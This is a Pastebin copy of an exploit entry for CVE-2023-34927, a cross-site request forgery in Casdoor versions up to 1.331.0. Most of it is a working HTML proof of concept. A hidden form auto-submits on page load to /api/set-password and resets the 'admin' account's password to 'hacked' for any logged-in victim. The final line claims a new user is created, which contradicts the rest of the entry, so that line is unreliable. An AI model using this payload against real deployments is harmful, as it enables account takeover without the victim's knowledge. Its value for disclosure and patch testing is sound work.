Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
- # Application: Casdoor
- # Version: <= 1.331.0
- # Date: 03/07/2024
- # Exploit Author: Van Lam Nguyen
- # Vendor Homepage: https://casdoor.org/
- # Software Link: https://github.com/casdoor/casdoor
- # Tested on: Windows
- # CVE : CVE-2023-34927
- Overview
- ==================================================
- Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
- This vulnerability allows attackers to arbitrarily change the victim user's password by supplying a crafted URL.
- Proof of Concept
- ==================================================
- Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
- <html>
- <form action="http://localhost:8000/api/set-password" method="POST">
- <input name='userOwner' value='built-in' type='hidden'>
- <input name='userName' value='admin' type='hidden'>
- <input name='newPassword' value='hacked' type='hidden'>
- <input type=submit>
- </form>
- <script>
- history.pushState('', '', '/');
- document.forms[0].submit();
- </script>
- </html>
- If a user is logged into the Casdoor Webapp at the time of execution, a new user will be created in the app with the following credentials
- userOwner: built-in
- userName: admin
- newPassword: hacked
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
